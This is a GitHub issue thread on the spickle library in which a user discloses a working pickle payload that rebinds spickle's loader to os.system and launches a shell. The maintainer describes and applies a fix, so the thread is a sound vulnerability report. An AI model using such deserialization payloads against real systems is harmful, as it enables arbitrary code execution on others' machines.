### ISSUE TITLE
Code execution through modifying existing structures in code

### ISSUE THREAD

**Issue by wapiflapi** [bwall/spickle#2]
This payload causes a call to `os.system('sh')`, arbitrary code execution is possible.

```python
spickle.loads("""\
cspickle
__dict__
S'mloads'
cos
system
sJ;sh;
.
""")
```

**Comment by bwall** [comment]
Solid exploit.

This has introduced a whole range of vulnerabilities based on modifying existing structures in the code.

I'm currently testing a solution where any global object which is determined to be mutable will be copied instead of having its reference being returned.  I'm working on ensuring it does not break normal functionality, and will post an update soon, I hope.

**Comment by bwall** [comment]
Unit test created and fix applied.  Thanks again!
